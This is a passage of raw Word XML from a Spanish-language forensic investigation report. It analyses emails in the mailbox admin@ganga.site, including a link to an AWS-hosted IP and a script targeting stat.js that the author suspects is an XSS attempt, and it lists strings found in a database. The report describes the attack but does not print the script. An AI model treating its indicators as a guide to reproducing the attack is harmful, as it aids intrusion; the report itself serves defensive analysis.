#10;AAAAAHxEAQBkcnMvX3JlbHMvZTJvRG9jLnhtbC5yZWxzUEsFBgAAAAAHAAcAvgEAAHhFAQAAAA==&#10;">
                <v:group id="Grupo 112" o:spid="_x0000_s1228" style="position:absolute;width:57905;height:12954" coordsize="65598,16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6ygAAAOMAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ni8Iw&#10;EIbvC/6HMIK3Na3uilSjiLjiQRb8APE2NGNbbCalybb1328EwePwzvvMPPNlZ0rRUO0KywriYQSC&#10;OLW64EzB+fTzOQXhPLLG0jIpeJCD5aL3McdE25YP1Bx9JgKEXYIKcu+rREqX5mTQDW1FHLKbrQ36&#10;MNaZ1DW2AW5KOYqiiTRYcLiQY0XrnNL78c8o2LbYrsbxptnfb+vH9fT9e9nHpNSg361mIDx1/r38&#10;au+0gidxOhl9ReHp4BR8QC7+AQAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAA&#10;AAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAA&#10;FQEAAAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAE/d0/rKAAAA&#10;4wAAAA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD+AgAA&#10;AAA=&#10;">
                  <v:shape id="Imagen 102" o:spid="_x0000_s1229" type="#_x0000_t75" style="position:absolute;top:159;width:48260;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GuFxQAAAOMAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/NagIx&#10;EL4X+g5hCt5q4qJbuzVKERQReqiK5yGZ7i7dTJYk1fXtm4LQ43z/s1gNrhMXCrH1rGEyViCIjbct&#10;1xpOx83zHERMyBY7z6ThRhFWy8eHBVbWX/mTLodUixzCsUINTUp9JWU0DTmMY98TZ+7LB4cpn6GW&#10;NuA1h7tOFkqV0mHLuaHBntYNme/Dj9PgvdqocH4xH3u3c+vSFAWZrdajp+H9DUSiIf2L7+6dzfNn&#10;s1c1naiyhL+fMgBy+QsAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQB0UGuFxQAAAOMAAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;">
                    <v:imagedata r:id="rId247" o:title=""/>
                  </v:shape>
                  <v:shape id="Imagen 103" o:spid="_x0000_s1230" type="#_x0000_t75" style="position:absolute;left:49139;width:16459;height:16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PsHywAAAOIAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvhf6H5RW81U0Eo0ldpRQEsVjQevD4yL5mg9m32+zWpP++Wyj0OMzMN8xqM9pO3KgPrWMF+TQD&#10;QVw73XKj4Py+fVyCCBFZY+eYFHxTgM36/m6FlXYDH+l2io1IEA4VKjAx+krKUBuyGKbOEyfvw/UW&#10;Y5J9I3WPQ4LbTs6yrJAWW04LBj29GKqvpy+r4NPk/uqH2eth3G8vh0Vphu7tqNTkYXx+AhFpjP/h&#10;v/ZOKyizRVkUy3wOv5fSHZDrHwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAA&#10;AAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAA&#10;ABUBAAALAAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQAnRPsHywAA&#10;AOIAAAAPAAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA/wIA&#10;AAAA&#10;">
                    <v:imagedata r:id="rId248" o:title=""/>
                  </v:shape>
                </v:group>
                <v:shape id="_x0000_s1231" type="#_x0000_t202" style="position:absolute;left:2020;top:12227;width:5593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XEygAAAOMAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9PS8Mw&#10;FL8LfofwBC+ypW5lrnXZGENBvQy7Xbw9mrem2ryUJN3qtzeC4PH9/r/VZrSdOJMPrWMF99MMBHHt&#10;dMuNguPhebIEESKyxs4xKfimAJv19dUKS+0u/E7nKjYihXAoUYGJsS+lDLUhi2HqeuLEnZy3GNPp&#10;G6k9XlK47eQsyxbSYsupwWBPO0P1VzVYBfv8Y2/uhtPT2zaf+9fjsFt8NpVStzfj9hFEpDH+i//c&#10;LzrNL/J5sZwVDwX8/pQAkOsfAAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAA&#10;AAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAA&#10;FQEAAAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAK8FxcTKAAAA&#10;4wAAAA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD+AgAA&#10;AAA=&#10;" stroked="f">
                  <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="212DC356" w14:textId="547B53CB" w:rsidR="001A6DCF" w:rsidRPr="00D40C18" w:rsidRDefault="001A6DCF" w:rsidP="001A6DCF">
                        <w:pPr>
                          <w:pStyle w:val="Descripcin"/>
                          <w:rPr>
                            <w:rFonts w:cs="Arial"/>
                            <w:noProof/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve">Ilustración </w:t>
                        </w:r>
                        <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                          <w:r w:rsidR="00117A4E">
                            <w:rPr>
                              <w:noProof/>
                            </w:rPr>
                            <w:t>60</w:t>
                          </w:r>
                        </w:fldSimple>
                        <w:r>
                          <w:t xml:space="preserve">: </w:t>
                        </w:r>
                        <w:bookmarkStart w:id="149" w:name="_Toc155782627"/>
                        <w:r w:rsidRPr="009A4B78">
                          <w:t xml:space="preserve">Correo de anatoly5676 indicando visitar una web y origen de la </w:t>
                        </w:r>
                        <w:r w:rsidR="00083E0D" w:rsidRPr="009A4B78">
                          <w:t xml:space="preserve">IP </w:t>
                        </w:r>
                        <w:r w:rsidRPr="009A4B78">
                          <w:t>18.195.165.56.</w:t>
                        </w:r>
                        <w:bookmarkEnd w:id="149"/>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap type="square"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00A703AB" w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Posteriormente, </w:t>
      </w:r>
      <w:r w:rsidR="00A703AB" w:rsidRPr="00B34E81">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>anatoly5676</w:t>
      </w:r>
      <w:r w:rsidR="00A703AB" w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> desde la misma dirección IP</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>IP (Internet Protocol): Protocolo de comunicaciones que proporciona una dirección única (IP) para cada dispositivo en la red.</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A703AB" w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> de Ucrania, procede a remitirle un enlace </w:t>
      </w:r>
      <w:r w:rsidR="00A703AB" w:rsidRPr="009940A1">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidR="00A703AB" w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, para que acceda a esa dirección IP. Casualmente es la dirección IP hallada anteriormente (18.195.165.56), al ser una comunicación entre maquinas con protocolo http, esta comunicación no va securizada, por lo que puede estar siendo intervenida por un tercero.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D8232E" w14:textId="24927493" w:rsidR="00A703AB" w:rsidRPr="00A703AB" w:rsidRDefault="00A703AB" w:rsidP="00A703AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Podemos observar que esa dirección </w:t>
      </w:r>
      <w:r w:rsidR="00443705" w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>IP (Internet Protocol): Protocolo de comunicaciones que proporciona una dirección única (IP) para cada dispositivo en la red.</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443705" w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>corresponde a una dirección IP de AWS</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>AWS</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText xml:space="preserve">: Acrónimo de </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Amazon Web Services</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A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> y, </w:t>
      </w:r>
      <w:r w:rsidR="00927E54" w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>además</w:t>
      </w:r>
      <w:r w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, se localiza en Alemania.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A47054B" w14:textId="2E8017B3" w:rsidR="00A703AB" w:rsidRDefault="00A703AB" w:rsidP="00A703AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">EL 30 de </w:t>
      </w:r>
      <w:r w:rsidR="00B34E81" w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>diciembre</w:t>
      </w:r>
      <w:r w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> de 2018 a las 11:46:38 UTC, se recibe otro correo dentro del buzón de </w:t>
      </w:r>
      <w:r w:rsidRPr="00B34E81">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>admin@ganga.site</w:t>
      </w:r>
      <w:r w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> donde se puede observar un </w:t>
      </w:r>
      <w:r w:rsidRPr="00B34E81">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Hello World</w:t>
      </w:r>
      <w:r w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> y debajo un script que ataca a un archivo llamado </w:t>
      </w:r>
      <w:r w:rsidRPr="00B34E81">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>stat.js</w:t>
      </w:r>
      <w:r w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> accesible a </w:t>
      </w:r>
      <w:r w:rsidR="009940A1" w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>través</w:t>
      </w:r>
      <w:r w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> de http en la dirección IP</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>IP (Internet Protocol): Protocolo de comunicaciones que proporciona una dirección única (IP) para cada dispositivo en la red.</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A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009940A1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>18.195.165.56</w:t>
      </w:r>
      <w:r w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="000F327A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00650633">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Si este correo lo unificamos en un correo anterior, puede ser las partes de un intento de ataque a través de</w:t>
      </w:r>
      <w:r w:rsidR="000F327A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000F327A" w:rsidRPr="00650633">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Cross Site Scripting(XSS).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090DE340" w14:textId="587CEC5D" w:rsidR="002B2DA4" w:rsidRPr="002B2DA4" w:rsidRDefault="00000000" w:rsidP="002B2DA4">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId249" w:history="1">
        <w:r w:rsidR="002B2DA4" w:rsidRPr="002B2DA4">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:rFonts w:cs="Arial"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>https://www.youtube.com/watch?v=EWGUznyQIhE&amp;ab_channel=VidaMRR-Programacionweb</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="002B2DA4" w:rsidRPr="002B2DA4">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065E9628" w14:textId="20CB5CB6" w:rsidR="00B34E81" w:rsidRPr="00B34E81" w:rsidRDefault="00144AF3" w:rsidP="00A703AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B34E81">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Bases de datos</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D67EFB4" w14:textId="654745BC" w:rsidR="00A703AB" w:rsidRPr="00A703AB" w:rsidRDefault="00A703AB" w:rsidP="00A703AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Aunque ya ha quedado un todo un poco más fluido y entendido de lo que ha ocurrido, lo cual se expondrá en las conclusiones, se procede a realizar un pequeño análisis de la base de datos. en la index.db encontramos las </w:t>
      </w:r>
      <w:r w:rsidR="00337772" w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>siguientes sentencias</w:t>
      </w:r>
      <w:r w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7763B3A4" w14:textId="725D35A1" w:rsidR="00A703AB" w:rsidRPr="00337772" w:rsidRDefault="00A703AB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="150" w:name="_Hlk155433565"/>
      <w:r w:rsidRPr="00337772">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Permit user logins after boot, prohibit user logins at shutdown</w:t>
      </w:r>
      <w:r w:rsidRPr="00337772">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EF7FF5" w14:textId="01AA2917" w:rsidR="00A703AB" w:rsidRPr="00337772" w:rsidRDefault="00A703AB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00337772">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Ukrainian character set encoded in octal, decimal, and hexadecimalmcookie</w:t>
      </w:r>
      <w:r w:rsidRPr="00337772">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0CAAB3" w14:textId="08C84AC7" w:rsidR="00A703AB" w:rsidRPr="00337772" w:rsidRDefault="00A703AB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00337772">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The Swiss Army Knife of Embedded Linuxrsh</w:t>
      </w:r>
      <w:r w:rsidR="00337772" w:rsidRPr="00337772">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FD86EC" w14:textId="34B07195" w:rsidR="00A703AB" w:rsidRPr="00337772" w:rsidRDefault="00F674A8">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251857920" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3E123BD0" wp14:editId="5BC467FD">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>328930</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6119495" cy="2016760"/>
                <wp:effectExtent l="0" t="0" r="0" b="2540"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="2081907459" name="Grupo 54"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="6119495" cy="2016760"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="6119922" cy="2016952"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wpg:grpSp>
                        <wpg:cNvPr id="1031920411" name="Grupo 114"/>
                        <wpg:cNvGrpSpPr/>
                        <wpg:grpSpPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="6119922" cy="1732915"/>
                            <a:chOff x="0" y="0"/>
                            <a:chExt cx="6119922" cy="1732915"/>
                          </a:xfrm>
                        </wpg:grpSpPr>
                        <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                          <pic:nvPicPr>
                            <pic:cNvPr id="26445364" name="Imagen 105"/>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bwMode="auto">
                            <a:xfrm>
                              <a:off x="0" y="0"/>
                              <a:ext cx="2776855" cy="1732915"/>
                            </a:xfrm>
                            <a:prstGeom prst="rect">
                              <a:avLst/>
                            </a:prstGeom>
                            <a:noFill/>
                            <a:ln>
                              <a:noFill/>
                            </a:ln>
                          </pic:spPr>
                        </pic:pic>
                        <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                          <pic:nvPicPr>
                            <pic:cNvPr id="1878068394" name="Imagen 106"/>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bwMode="auto">
                            <a:xfrm>
                              <a:off x="2886502" y="0"/>
                              <a:ext cx="3233420" cy="1703070"/>
                            </a:xfrm>
                            <a:prstGeom prst="rect">
                              <a:avLst/>
                            </a:prstGeom>
                            <a:noFill/>
                            <a:ln>
                              <a:noFill/>
                            </a:ln>
                          </pic:spPr>
                        </pic:pic>
                      </wpg:grpSp>
                      <wps:wsp>
                        <wps:cNvPr id="696019639" name="Cuadro de texto 1"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="361507" y="1733107"/>
                            <a:ext cx="5461000" cy="283845"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:prstClr val="white"/>
                          </a:solidFill>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="36EAD1C9" w14:textId="2BCBA53E" w:rsidR="00CF5038" w:rsidRPr="0061708F" w:rsidRDefault="00CF5038" w:rsidP="00CF5038">
                              <w:pPr>
                                <w:pStyle w:val="Descripcin"/>
                                <w:rPr>
                                  <w:noProof/>
                                  <w:szCs w:val="24"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve">Ilustración </w:t>
                              </w:r>
                              <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                                <w:r w:rsidR="00117A4E">
                                  <w:rPr>
                                    <w:noProof/>
                                  </w:rPr>
                                  <w:t>61</w:t>
                                </w:r>
                              </w:fldSimple>
                              <w:r>
                                <w:t xml:space="preserve">: </w:t>
                              </w:r>
                              <w:bookmarkStart w:id="151" w:name="_Toc155782628"/>
                              <w:r w:rsidRPr="00197107">
